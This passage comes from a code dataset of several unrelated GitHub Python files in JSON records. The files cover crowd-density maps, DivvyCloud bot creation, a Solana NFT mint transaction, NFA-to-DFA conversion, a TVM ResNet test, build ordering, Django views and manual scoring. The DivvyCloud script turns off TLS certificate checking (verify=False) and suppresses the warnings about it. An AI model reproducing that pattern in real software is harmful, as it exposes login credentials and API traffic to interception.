# build kdtree\n tree = scipy.spatial.KDTree(pointsList.copy(), leafsize=leafsize)\n # query kdtree\n distances, locations = tree.query(pointsList, k=4)\n\n print ('\\t generate density...')\n for i, pt in enumerate(pointsList):\n pt2d = np.zeros(image_shape, dtype=np.float32)\n if int(pt[1]) < image_shape[0] and int(pt[0]) < image_shape[1]:\n pt2d[int(pt[1]),int(pt[0])] = 1.\n else:\n continue\n if ground_truth_count > 1:\n sigma = (distances[i][1]+distances[i][2]+distances[i][3])*0.1\n else:\n sigma = np.average(np.array(image_shape))/2./2. 
#case: 1 point\n density_map += scipy.ndimage.filters.gaussian_filter(pt2d, sigma, mode='constant')\n print ('\\t done.')\n return density_map\n\n\nif __name__==\"__main__\":\n root = 'C:\\\\Users\\\\PC\\\\Desktop\\\\PFE related\\\\existing works\\\\Zhang_Single-Image_Crowd_Counting_CVPR_2016_paper code sample\\\\MCNN-pytorch-master\\\\MCNN-pytorch-master\\\\ShanghaiTech'\n \n # generate the ShanghaiA's ground truth\n part_A_train = os.path.join(root,'part_A\\\\train_data','images')\n part_A_test = os.path.join(root,'part_A\\\\test_data','images')\n # part_B_train = os.path.join(root,'part_B_final/train_data','images')\n # part_B_test = os.path.join(root,'part_B_final/test_data','images')\n # path_sets = [part_A_train,part_A_test]\n \n # img_paths = []\n # for path in path_sets:\n # for img_path in glob.glob(os.path.join(path, '*.jpg')):\n # img_paths.append(img_path)\n \n # for img_path in img_paths:\n # print(img_path)\n # mat = io.loadmat(img_path.replace('.jpg','.mat').replace('images','ground-truth').replace('IMG_','GT_IMG_'))\n # img= plt.imread(img_path)#768行*1024列\n # k = np.zeros((img.shape[0],img.shape[1]))\n # points = mat[\"image_info\"][0,0][0,0][0] #1546person*2(col,row)\n # mdGen=KNN_Gaussian_Kernal_DMGenerator()\n # k = mdGen.generate_densitymap(img,points)\n # # plt.imshow(k,cmap=CM.jet)\n # # save density_map to disk\n # np.save(img_path.replace('.jpg','.npy').replace('images','ground-truth'), k) \n x=np.load('C:\\\\Users\\\\PC\\\\Desktop\\\\PFE related\\\\existing works\\\\Zhang_Single-Image_Crowd_Counting_CVPR_2016_paper code sample\\\\MCNN-pytorch-master\\\\MCNN-pytorch-master\\\\ShanghaiTech\\\\ShanghaiTech\\\\part_A\\\\test_data\\\\ground-truth\\\\IMG_80.npy')\n print(type(x))\n print(x.shape)","repo_name":"goldenfay/crowd-counting-pytorch","sub_path":"ML_package/density_map_generators/knn_gaussian_kernal.py","file_name":"knn_gaussian_kernal.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"43626182500","text":"## BOT STATE == paused\n## TRIGGER Bot == disabled\n### Pack_ID needs to be updated\n\n# Script to create a bot for all insights in a pack\nimport json\nimport requests\nimport getpass\n\nrequests.packages.urllib3.disable_warnings() # verify=False in the request throws a security error otherwise\n\n# Username/password to authenticate against the API\nusername = \"\"\npassword = \"\" # Leave this blank if you don't want it in plaintext and it'll prompt you to input it when running the script. 
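A quick property check for the generator above: each Gaussian kernel integrates to roughly 1, so the finished density map should sum to about the head count. A self-contained sketch with made-up points and sigma:

```python
import numpy as np
from scipy.ndimage import gaussian_filter

shape = (64, 64)
points = [(10, 20), (30, 40), (50, 12)]  # (col, row) annotations, illustrative

# Place a unit impulse per head, blur each one, and accumulate.
density = np.zeros(shape, dtype=np.float32)
for col, row in points:
    impulse = np.zeros(shape, dtype=np.float32)
    impulse[row, col] = 1.0
    density += gaussian_filter(impulse, sigma=4.0, mode='constant')

print(density.sum())  # ~3.0, modulo mass lost at the borders
```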
\n\nif not password:\n passwd = getpass.getpass('Password:')\nelse:\n passwd = password\n\n# API URLs\nbase_url = ''\nlogin_url = base_url + '/v2/public/user/login'\n\n# PARAMS\npack_id = \"custom:167\"\npack_split = pack_id.split(\":\")\npack_number = int(pack_split[1])\nbackoffice_or_custom = pack_split[0]\n\n# Shorthand helper function\ndef get_auth_token():\n response = requests.post(\n url=login_url,\n verify=False,\n data=json.dumps({\"username\": username, \"password\": passwd}),\n headers={\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Accept': 'application/json'\n })\n return response.json()['session_id']\n\ndef get_packs():\n response = requests.get(\n url=base_url + '/v2/public/insights/packs/list',\n verify=False,\n headers=headers\n )\n return response.json()\n\ndef get_insights():\n response = requests.get(\n url=base_url + '/v2/public/insights/list',\n verify=False,\n headers=headers\n )\n return response.json() \n\ndef make_bot(insight):\n bot_name = insight['name'] + \" - ServiceNow\"\n bot_message = \"Security issue found. Name: *\" + insight['name'] + \"* Resource Name: *{{resource.name}}*\"\n \n data = {\n \"name\": bot_name,\n \"description\": \"ServiceNow Integration\",\n \"severity\": \"low\",\n \"category\": \"Security\",\n \"ondemand_enabled\": True,\n \"state\": \"PAUSED\",\n \"instructions\": {\n \"resource_types\": insight['resource_types'],\n \"groups\": [],\n \"filters\": insight['filters'],\n \"schedule\": None,\n \"schedule_description\": None,\n #All cloud accounts\n \"badges\": [\n {\n \"key\": \"system.resource_type\",\n \"value\": \"cloud\"\n }\n ],\n \"ondemand_enabled\": True,\n \"hookpoints\": [ \n \"divvycloud.resource.created\",\n \"divvycloud.resource.modified\"\n ],\n \"actions\": [\n {\n \"run_when_result_is\": True,\n \"config\": {\n \"description\": bot_name,\n \"urgency\": \"1\",\n \"comments\": bot_message\n },\n \"name\": \"servicenow.action.create_incident\"\n }\n ]\n }\n }\n response = requests.post(\n url=base_url + '/v2/public/botfactory/bot/create',\n verify=False,\n data=json.dumps(data),\n headers=headers\n )\n return response.json() \n\ndef trigger_bot( bot_id):\n response = requests.post(\n url=base_url + '/v2/public/botfactory/' + bot_id + '/ondemand',\n verify=False,\n headers=headers\n )\n return response.json() \n \nauth_token = get_auth_token()\n \nheaders = {\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Accept': 'application/json',\n 'X-Auth-Token': auth_token\n}\n \n# Get the list of packs to loop through and look for the one that was defined\npack_response = get_packs()\n \n# Get the pack ID\nfound_pack = False\nfor pack in pack_response:\n if pack['pack_id'] == pack_number:\n if pack['source'] == backoffice_or_custom:\n found_pack = True\n print(\"Found matching pack. Name: \" + pack['name'])\n backoffice_insights = pack['backoffice'] # Normal insights are in the backoffice array \n custom_insights = (pack['custom']) # Custom insights are in the custom array. Add them to backoffice\n break \n\nif not found_pack:\n print(\"No pack found matching \\\"\" + pack_id + \"\\\". 
Exiting.\")\n exit()\n\n# Get the info from the insights in the pack\ninsights_response = get_insights() \n\n# look through the insights for a matching ID\n# if we find it - create a bot\nprint(\"\\n == Creating bots from backoffice insights\")\nfor backoffice_insight in backoffice_insights:\n for insight in insights_response:\n if insight['source'] == \"backoffice\":\n if insight['insight_id'] == backoffice_insight:\n new_bot = make_bot(insight)\n print(\"Made a new bot: \" + new_bot['name'])\n \n # bot_trigger = trigger_bot( new_bot['resource_id'])\n # print(\"Triggered bot\")\n break\n\nprint(\"\\n == Creating bots from custom insights\")\nfor custom_insight in custom_insights:\n for insight in insights_response:\n if insight['source'] == \"custom\":\n if insight['insight_id'] == custom_insight:\n new_bot = make_bot(insight)\n print(\"Made a new bot: \" + new_bot['name'])\n \n # bot_trigger = trigger_bot( new_bot['resource_id'])\n # print(\"Triggered bot\")\n break\n","repo_name":"alpalwal/Divvy","sub_path":"Prod/scripts/Create Bots/full_pack_create_bots.py","file_name":"full_pack_create_bots.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"3477324556","text":"from anchorpy import Wallet\nfrom solana.rpc.api import Client\nfrom solana.rpc.types import TxOpts\nfrom solana.rpc.commitment import Commitment\nfrom solana.blockhash import Blockhash\nfrom solana.keypair import Keypair\nfrom solana.publickey import PublicKey\nfrom solana.transaction import AccountMeta, TransactionInstruction, Transaction\nfrom solana.system_program import create_account, CreateAccountParams\nfrom spl.token.instructions import InitializeMintParams, MintToParams, create_associated_token_account, get_associated_token_address, initialize_mint, mint_to\nfrom base58 import b58decode, b58encode\nfrom solana.rpc.core import UnconfirmedTxError\n\n\nTOKEN_PROGRAM_ID = 'TokenkegQfeZyiNwAJbNbGKPFXCWuBvf9Ss623VQ5DA'\nMETADATA_PROGRAM_ID = 'metaqbxxUerdq28cj1RbAWkYQm3ybzjb6a8bt518x1s'\nSYSTEM_PROGRAM_ID = '11111111111111111111111111111111'\nSYSTEM_RENT_PROGRAM = 'SysvarRent111111111111111111111111111111111'\nSYSTEM_CLOCK_PROGRAM = 'SysvarC1ock11111111111111111111111111111111'\nMETADATA_PUBLIC_KEY = 'metaqbxxUerdq28cj1RbAWkYQm3ybzjb6a8bt518x1s'\nASSOCIATED_TOKEN_ID = 'ATokenGPvbdGVxr1b2hvZbsiqW5xWH25efTNsLJA8knL'\nCOMPUTE_BUDGET_ID = \"ComputeBudget111111111111111111111111111111\"\n\nLMN_PROGRAM = \"ArAA6CZC123yMJLUe4uisBEgvfuw2WEvex9iFmFCYiXv\"\nLMN_TRESAURY = \"33nQCgievSd3jJLSWFBefH3BJRN7h6sAoS82VFFdJGF5\"\n\nOPTS = TxOpts(skip_preflight=True, skip_confirmation=False, preflight_commitment=Commitment(\"confirmed\"))\n \nclass LaunchMyNftLaunchpad():\n\n def __init__(self, privkey: str, rpc: str, cmid: str, candy_machine_meta):\n\n self.cmid = cmid\n \n self.cm_meta = candy_machine_meta\n \n self.client = Client(rpc)\n self.payer = Keypair.from_secret_key(b58decode(privkey))\n\n def create_transaction(self):\n\n self.transaction = Transaction()\n \n self.mint_account = Keypair.generate()\n\n buyer_ata = get_associated_token_address(owner=self.payer.public_key, mint=self.mint_account.public_key)\n\n self.transaction.add(\n TransactionInstruction(\n keys=[],\n data=bytes.fromhex(\"0080a9030010270000\"),\n program_id=PublicKey(COMPUTE_BUDGET_ID)\n )\n )\n \n METADATA_PROGRAM_ADDRESS = PublicKey.find_program_address(\n seeds=[\n 'metadata'.encode('utf-8'),\n bytes(PublicKey(METADATA_PUBLIC_KEY)),\n 
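The bot-creation script above re-sends the same headers in every helper; a requests.Session would carry the auth token once and reuse the underlying connection. A hedged sketch (base_url and the token value are placeholders):

```python
import requests

session = requests.Session()
session.verify = False  # mirrors the script's verify=False; avoid in production
session.headers.update({
    'Content-Type': 'application/json;charset=UTF-8',
    'Accept': 'application/json',
    'X-Auth-Token': '<auth token from /v2/public/user/login>',
})

def get_insights(base_url):
    # Headers and TLS settings come from the session, not each call.
    resp = session.get(base_url + '/v2/public/insights/list')
    resp.raise_for_status()
    return resp.json()
```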
bytes(self.mint_account.public_key)\n ],\n program_id=PublicKey(METADATA_PUBLIC_KEY)\n )\n\n EDITION_PROGRAM_ADDRESS = PublicKey.find_program_address(\n seeds=[\n 'metadata'.encode('utf-8'),\n bytes(PublicKey(METADATA_PUBLIC_KEY)),\n bytes(self.mint_account.public_key),\n 'edition'.encode('utf-8')\n ],\n program_id=PublicKey(METADATA_PUBLIC_KEY)\n )\n\n TOTAL_MINTS = PublicKey.find_program_address(\n seeds=[\n 'TotalMints'.encode('utf-8'),\n bytes(PublicKey(self.payer.public_key)),\n bytes(PublicKey(self.cmid)),\n ],\n program_id=PublicKey(LMN_PROGRAM)\n )\n keys = [\n AccountMeta(pubkey=PublicKey(self.cmid),is_writable=True, is_signer=False),\n AccountMeta(pubkey=self.payer.public_key,is_signer=True, is_writable=True),\n AccountMeta(pubkey=PublicKey(self.cm_meta.wallet),is_writable=True, is_signer=False),\n AccountMeta(pubkey=PublicKey(LMN_TRESAURY),is_writable=True, is_signer=False),\n AccountMeta(pubkey=METADATA_PROGRAM_ADDRESS[0], is_writable=True, is_signer=False),\n AccountMeta(pubkey=self.mint_account.public_key,is_writable=True, is_signer=True),\n AccountMeta(pubkey=buyer_ata, is_writable=True, is_signer=False),\n AccountMeta(pubkey=EDITION_PROGRAM_ADDRESS[0], is_writable=True, is_signer=False),\n AccountMeta(pubkey=PublicKey(TOTAL_MINTS[0]), is_writable=True, is_signer=False),\n AccountMeta(pubkey=PublicKey(ASSOCIATED_TOKEN_ID),is_writable=False, is_signer=False),\n AccountMeta(pubkey=PublicKey(METADATA_PROGRAM_ID),is_writable=False, is_signer=False),\n AccountMeta(pubkey=PublicKey(TOKEN_PROGRAM_ID),is_signer=False, is_writable=False),\n AccountMeta(pubkey=PublicKey(SYSTEM_PROGRAM_ID),is_writable=False, is_signer=False),\n AccountMeta(pubkey=PublicKey(SYSTEM_RENT_PROGRAM),is_writable=False, is_signer=False),\n AccountMeta(pubkey=PublicKey(SYSTEM_CLOCK_PROGRAM),is_signer=False, is_writable=False)\n ]\n\n price_data = list(int(self.cm_meta.data.price).to_bytes(8, \"little\"))\n main_data = list(bytes.fromhex(\"4f47cf20b266151300000000\"))\n\n data = main_data + price_data\n\n encoded_data = b58encode(bytes(data))\n data = b58decode(encoded_data)\n\n self.transaction.add(\n TransactionInstruction(\n keys=keys,\n data=data,\n program_id=PublicKey(LMN_PROGRAM)\n )\n )\n\n self.signers = [\n self.payer,\n self.mint_account\n ]\n\n \n def send_transaction(self):\n\n try:\n \n self.transaction.sign(*self.signers)\n \n tx = self.transaction.serialize(verify_signatures=False)\n\n tx_hash = self.client.send_raw_transaction(tx, OPTS)['result']\n \n return tx_hash\n\n except UnconfirmedTxError:\n\n return None\n\n except:\n \n return False\n\n\n\nif __name__ == \"__main__\":\n\n LaunchMyNftLaunchpad()\n","repo_name":"ProcreationAI/Neura","sub_path":"modules/lmn_launchpad.py","file_name":"lmn_launchpad.py","file_ext":"py","file_size_in_byte":5700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"25639876785","text":"import json\nimport sys\nfrom itertools import combinations\n\n\n #////////// Regex to NFA //////////////////////////////////////\n\nimport subprocess\nimport json\n\ndata = {\"regex\": input(\" Enter a regular expression: \")}\n\nwith open('regex.json', 'w') as f:\n json.dump(data, f)\n\ninput_file = \"regex.json\"\noutput_file = \"outputNFA.json\"\n\nsubprocess.run([\"python3\", \"regtodfa.py\", input_file, output_file], check=True)\n\n#///////////////////////////////////////////////////////////////\n\n\ndef check(arr,pos):\n for tup in arr:\n if set(tup)==set(pos):\n return 0\n return 1\n\n\ndef check1(arr,pos):\n for 
tup in arr:\n if tup==pos:\n return 0\n return 1\n\nclass nfa_to_dfa:\n def __init__(self,states,letters,transition,start_states,final_states):\n \n self.startstates=self.get_startstates(start_states,transition)\n self.allstates=self.powerset(states)\n self.final_states=self.get_finalstates(final_states)\n self.letters=letters\n self.transition=self.main_matrix(transition)\n self.prints()\n\n def prints(self):\n out={\n \"states\":self.allstates,\n \"letters\":self.letters,\n \"transition_function\":self.transition,\n \"start_states\":self.startstates,\n \"final_states\":self.final_states\n }\n \n with open(sys.argv[2],'w') as outfile:\n json.dump(dict(out),outfile,indent=4)\n\n\n def main_matrix(self,transition):\n #write separately for empty\n trans_matrix=[]\n for state in self.allstates: \n for alph in self.letters:\n dest_arr=[]\n found=0 #if alphabet not found put phi\n for st in state:\n #check through transition matrix and append states ,if nothing is found append to phi\n for tran in transition:\n if tran[0]==st and tran[1]==alph and st!=\"\" and check1(dest_arr,tran[2]):\n dest_arr.append(tran[2])\n found=1\n trans_matrix.append([state,alph,dest_arr])\n # for alph in self.letters:\n # trans_matrix.append([[],alph,[]])\n return trans_matrix\n\n\n def get_finalstates(self,finalstates):\n finalarr=[]\n for state in finalstates:\n for pos in self.allstates:\n for each_state in pos:\n if each_state==state and check(finalarr,pos):\n finalarr.append(pos)\n return finalarr \n\n\n\n def powerset(self,states):\n all_arr=[]\n for i in range(1,len(states)+1):\n for element in combinations(states,i):\n all_arr.append(list(element))\n all_arr.append([]) \n return all_arr\n\n\n def get_startstates(self,startstates,transition):\n start_arr=[]\n for start in startstates:\n arr=[]\n arr.append(start) \n for tup in transition:\n if tup[0]==start and tup[1]==\"$\":\n arr.append(tup[2])\n start_arr.append(arr) \n return start_arr \n\n\n\nif(len(sys.argv) == 3):\n \n input_file = open(sys.argv[1],\"r\") \n file_obj = json.load(input_file)\n states = file_obj['states']\n letters=file_obj['letters']\n transition=file_obj['transition_function']\n start_states=file_obj['start_states']\n final_states=file_obj['final_states']\n dfa=nfa_to_dfa(states,letters,transition,start_states,final_states)\n print(\"------------------------------\\n\")\n print(\" DFA \\n\")\n print(\"------------------------------\\n\")\n print(\"DFA states:\", dfa.allstates)\n print(\"\\nDFA alphabets:\", dfa.letters)\n print(\"\\nDFA transitions:\", dfa.transition)\n print(\"\\nDFA start state:\", dfa.startstates)\n print(\"\\nDFA final states:\", dfa.final_states)\n print(\"\\n------------------------------\\n\")\n\nelse: \n print(\"Error\")\n print(\"Usage: python3 NFAtoDFA.py <input_json> <output_json>\")\n # python3 NFAtoDFA.py outputNFA.json outputDFA.json \n \n\n","repo_name":"sohaibssb/BuildCompiler","sub_path":"RegexToNFA_ToDFA_ToDFAM/NFAtoDFA.py","file_name":"NFAtoDFA.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"12441340585","text":"\n#\n# Inspur.\n# This is a new or modified file.\n#\n\nimport tvm\nfrom tvm import relay\nfrom PIL import Image\n# os and numpy\nimport numpy as np\nimport os.path\n# Tensorflow imports\nimport tensorflow as tf\nfrom tensorflow.core.framework import graph_pb2\n# Tensorflow utility functions\nimport tvm.relay.testing.tf as tf_testing\nimport argparse\nimport 
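Note that get_startstates above follows only a single '$' hop from each start state; a full epsilon-closure iterates until no new state appears. A minimal sketch using the same [src, symbol, dst] transition triples as the JSON files:

```python
def epsilon_closure(states, transitions):
    # Follow '$' (epsilon) transitions transitively, not just one hop.
    closure = set(states)
    stack = list(states)
    while stack:
        state = stack.pop()
        for src, symbol, dst in transitions:
            if src == state and symbol == '$' and dst not in closure:
                closure.add(dst)
                stack.append(dst)
    return closure

transitions = [['q0', '$', 'q1'], ['q1', '$', 'q2'], ['q1', 'a', 'q3']]
print(sorted(epsilon_closure({'q0'}, transitions)))  # ['q0', 'q1', 'q2']
```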
time\n######################################################################\ntarget = 'xpu -libs=xdnn -split-device-funcs'\ntarget_host = 'llvm'\nlayout = \"NCHW\"\n#layout = None\n#ctx = tvm.context(target, 0)\n#print('ctx = ', ctx)\n#print('type of ctx = ', type(ctx))\n'''\ntarget = 'llvm'\ntarget_host = 'llvm'\nlayout = None\n#layout = \"NHWC\"\nlayout = \"NCHW\"\n#ctx = tvm.cpu(0)\nctx = tvm.context(target, 0)\n\ntarget = 'cuda'\ntarget_host = 'llvm'\nlayout = None\n#layout = \"NHWC\"\nlayout = \"NCHW\"\n#ctx = tvm.cpu(0)\nctx = tvm.context(target, 0)\n'''\n\n######################################################################\n# img_path = '/home/wangfan/.tvm_test_data/data/elephant-299.jpg'\n# model_path = '/home/wangfan/.tvm_test_data/tf/resnet50v2/resnet50_v2_inf_graph.frozen.pb'\n\ndef preprocess_image_rgb(\n image_path,\n resize_h, resize_w,\n need_scale, image_scale,\n red_bias, green_bias, blue_bias):\n # 1, resize the image\n img = Image.open(image_path).resize((resize_h, resize_w), Image.ANTIALIAS)\n image = np.asarray(img).astype(\"float32\")\n # 2, NHWC format\n img_nhwc = np.expand_dims(image, axis = 0)\n if need_scale:\n img_nhwc[:,:,:,0] = image_scale * img_nhwc[:,:,:,0] + red_bias\n img_nhwc[:,:,:,1] = image_scale * img_nhwc[:,:,:,1] + green_bias\n img_nhwc[:,:,:,2] = image_scale * img_nhwc[:,:,:,2] + blue_bias\n # 3, NCHW format\n img_nchw = img_nhwc.transpose((0,3,1,2))\n return img_nhwc, img_nchw\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--pb-path', '-p', type=str, default='',\n help=\"The tensorflow pb file path\")\nparser.add_argument('--image-path', type=str, default='',\n help=\"The input data. If not set, will use dnn-root-path's cat image\")\nargs = parser.parse_args()\n\nimg_path = '/home/wangfan/.tvm_test_data/data/elephant-299.jpg'\nmodel_path = '/home/wangfan/.tvm_test_data/tf/resnet50v2/resnet50_v2_inf_graph.frozen.pb'\n#img_path = args.image_path\n#model_path = args.pb_path\n\nimg_nhwc, img_tvm = preprocess_image_rgb(\n img_path,\n 224, 224,\n True, 2.0 / 255.0,\n -1, -1, -1\n )\n\n######################################################################\n# Import model\n# ------------\n# Creates tensorflow graph definition from protobuf file.\n\nwith tf.gfile.FastGFile(model_path, 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n graph = tf.import_graph_def(graph_def, name='')\n # Call the utility to import the graph definition into default graph.\n graph_def = tf_testing.ProcessGraphDefParam(graph_def)\n #print(graph_def)\n # Add shapes to the graph.\n with tf.Session() as sess:\n graph_def = tf_testing.AddShapesToGraphDef(sess, 'resnet_v1_50/predictions/Reshape_1')\n\n######################################################################\n# Decode image\nfrom PIL import Image\nimage = Image.open(img_path).resize((224, 224))\n\nx = np.array(img_nhwc) \n#print(x.shape) # shenfw add\n#x = np.random.randint(10, size=(1, 224, 224, 3)) # shenfw add\n#x = np.array(x.astype(float)) # shenfw add\n#print(x.shape) # shenfw add\n######################################################################\n# Import the graph to Relay\n# -------------------------\n# Import tensorflow graph definition to relay frontend.\n#\n# Results:\n# sym: relay expr for given tensorflow protobuf.\n# params: params converted from tensorflow params (tensor protobuf).\nshape_dict = {'input__0': x.shape}\n#dtype_dict = {'DecodeJpeg/contents': 'uint8'}\nmod, params = relay.frontend.from_tensorflow(graph_def,\n layout=layout,\n 
shape=shape_dict)\nprint(\"Tensorflow protobuf imported to relay frontend.\")\n\n# print(mod)\n\n# Relay Build\n# -----------\n# Compile the graph to llvm target with given input specification.\n#\n# Results:\n# graph: Final graph after compilation.\n# params: final params after compilation.\n# lib: target library which can be deployed on target with TVM runtime.\n\nwith relay.build_config(opt_level=3):\n graph, lib, params = relay.build(mod,\n target=target,\n target_host=target_host,\n params=params)\n######################################################################\n# Execute the portable graph on TVM\n# ---------------------------------\n# Now we can try deploying the compiled model on target.\n#print(graph)\nfrom tvm.contrib import graph_runtime\nm = graph_runtime.create(graph, lib)\n# set inputs\nm.set_input('input', tvm.nd.array(x.astype(\"float32\")))\nm.set_input(**params)\nm.run()\n#print('ctx = ', ctx)\nprint('lib = ', lib)\n#print('graph = ', graph)\ntvm_output = m.get_output(0, tvm.nd.empty((1, 1000), 'float32')) # 1, 1000\n\nstart = time.time()\nfor i in range(100):\n #m.set_input('input', tvm.nd.array(x.astype(\"float32\")))\n m.run()\n tvm_output = m.get_output(0, tvm.nd.empty((1, 1000), 'float32'))\nend = time.time()\n#tvm_output = m.get_output(0, tvm.nd.empty((1, 1000), 'float32')) \nprint('the runtime is: ')\nprint((end-start)*1000/100.)\nprint(\"===================== TVM output ===============================\")\npredictions = tvm_output.asnumpy()\npredictions = np.squeeze(predictions)\nxtcl_topk = predictions.argsort()[-5:][::-1]\nprint(xtcl_topk)\n\n######################################################################\ndef run_inference_on_image(image):\n \"\"\"Runs inference on an image.\n Parameters\n ----------\n image: String\n Image file name.\n Returns\n -------\n Nothing\n \"\"\"\n # evaluate TF\n tf.reset_default_graph()\n graph_def = graph_pb2.GraphDef()\n with open(model_path, 'rb') as f:\n graph_def.ParseFromString(f.read())\n g = tf.import_graph_def(graph_def)\n with tf.Session(graph=g) as sess:\n image_input_tensor = sess.graph.get_tensor_by_name('import/' + 'input:0')\n outputs = [sess.graph.get_tensor_by_name(\"import/\" + 'resnet_v1_50/predictions/Reshape_1:0')]\n predictions = sess.run(outputs, feed_dict={image_input_tensor: img_nhwc})\n predictions = np.squeeze(predictions)\n top_k = predictions.argsort()[-5:][::-1]\n print(\"===================== Tensorflow output ===============================\")\n print(top_k)\n return top_k\n#begin = time.time()\ntf_topk = run_inference_on_image(img_path)\n#end = time.time()\n#print('tf time is: ', end-begin)\nassert np.alltrue(xtcl_topk == tf_topk)\n","repo_name":"LCAI-TIHU/SW","sub_path":"compiler_runtime/tutorials/frontend/test_resnet50v1.py","file_name":"test_resnet50v1.py","file_ext":"py","file_size_in_byte":6863,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"72"} +{"seq_id":"23085713624","text":"from collections import deque\nfrom typing import List\n\n\nclass Edge:\n def __init__(self, u, v):\n self.u = u\n self.v = v\n self.used = False\n\n\ndef get_build_order(n: int, graph: List[List[int]], edges: List[Edge]) -> List[int]:\n build_order = [-1] * n\n order = 0\n for i in range(n):\n q = deque([i])\n while q:\n u = q.popleft()\n if build_order[u] >= 0:\n continue\n buildable = True\n for j in graph[u]:\n if edges[j].v == u and not edges[j].used:\n buildable = False\n if buildable:\n build_order[u] = order\n order += 1\n for j in graph[u]:\n if 
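The benchmark at the end of the TVM script above times 100 runs with time.time(); a small reusable sketch using the higher-resolution time.perf_counter, where run_once stands in for m.run() plus m.get_output():

```python
import time

def benchmark(run_once, n=100):
    run_once()  # warm-up, excluded from the measurement
    start = time.perf_counter()
    for _ in range(n):
        run_once()
    return (time.perf_counter() - start) * 1000.0 / n  # ms per run

# Illustrative workload in place of the compiled module's run():
print(benchmark(lambda: sum(range(100000))))
```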
edges[j].u == u:\n edges[j].used = True\n q.append(edges[j].v)\n res = [0] * n\n for i in range(n):\n if build_order[i] < 0:\n return []\n res[build_order[i]] = i\n return res\n\n\ndef ns(f):\n return next(f).strip()\n\n\ndef solve(fp: str) -> None:\n print(f\"# {fp}\")\n with open(fp) as f:\n n, m = map(int, ns(f).split())\n graph = [[] for _ in range(n)]\n edges = [None for _ in range(m)]\n for i in range(m):\n u, v = map(lambda x: int(x) - 1, ns(f).split())\n edges[i] = Edge(u, v)\n graph[u].append(i)\n graph[v].append(i)\n res = get_build_order(n, graph, edges)\n print(\" \".join(list(map(lambda x: str(x + 1), res))) if res else \"error\")\n print()\n\n\n# solve(\"../testcases/04_07/01.txt\")\n# solve(\"../testcases/04_07/02.txt\")\n# solve(\"../testcases/04_07/03.txt\")\n# solve(\"../testcases/04_07/04.txt\")\n# solve(\"../testcases/04_07/05.txt\")\n# solve(\"../testcases/04_07/06.txt\")\n\n# # ../testcases/04_07/01.txt\n# 5 6 2 1 4 3\n\n# # ../testcases/04_07/02.txt\n# error\n\n# # ../testcases/04_07/03.txt\n# 2 1 3 5 12 9 8 4 7 6 10 11\n\n# # ../testcases/04_07/04.txt\n# error\n\n# # ../testcases/04_07/05.txt\n# 1 2\n\n# # ../testcases/04_07/06.txt\n# error\n","repo_name":"e5pe0n/algorithm-training","sub_path":"cracking_the_coding_interview_6th/chapter04/python/04_07_v01.py","file_name":"04_07_v01.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"25263604967","text":"from django.shortcuts import render, get_object_or_404\n\nfrom core.filters import ProductFilter\nfrom core.view_logger import view_logger\nfrom .models import Product\nfrom .services.crud import filtering_related_products,paginate, get_all_brands\n\n\n# @view_logger\ndef get_all_products(request):\n \"\"\"Return all products on the main catalog page\"\"\"\n\n filter_obj = ProductFilter(request.GET, queryset=Product.objects.select_related('brand','category','gender'))\n\n context = {\n 'title': 'Catalog',\n 'products': paginate(request, filter_obj.qs),\n 'current_sort': request.GET.get('sorting'),\n 'brands': get_all_brands(),\n 'filter': filter_obj\n }\n return render(request, 'productapp/products.html', context)\n\n\n\n@view_logger\ndef get_single_product_page(request, pk: int):\n \"\"\" Return a single product card, along with related products filtered by the gender\n that matches the product on the card\"\"\"\n\n product = get_object_or_404(Product, pk=pk)\n context = {\n 'title': 'Product page',\n 'product': product,\n 'products': filtering_related_products(product),\n }\n return render(request, 'productapp/single_product.html', context)\n","repo_name":"Korwys/django-online-store","sub_path":"mainapp/productapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"35393281565","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@Author :apple.li\n@Time :2020/6/4 13:56\n@File :score_fn.py\n@Desc :\n\"\"\"\n\n\ndef test_score(file_path):\n with open(file_path, encoding='utf-8') as fr:\n score = 0.0\n sample_num = 0\n history = []\n while True:\n line = fr.readline()\n if not line:\n break\n line = line.strip()\n if line == '':\n print('\\n'.join(history))\n while True:\n s = input('Score ? ')\n try:\n s = float(s)\n break\n except ValueError:\n print('\"s\" must be a float!')\n continue\n score += s\n sample_num += 1\n print('Score: {:.2f}. Num: {}. 
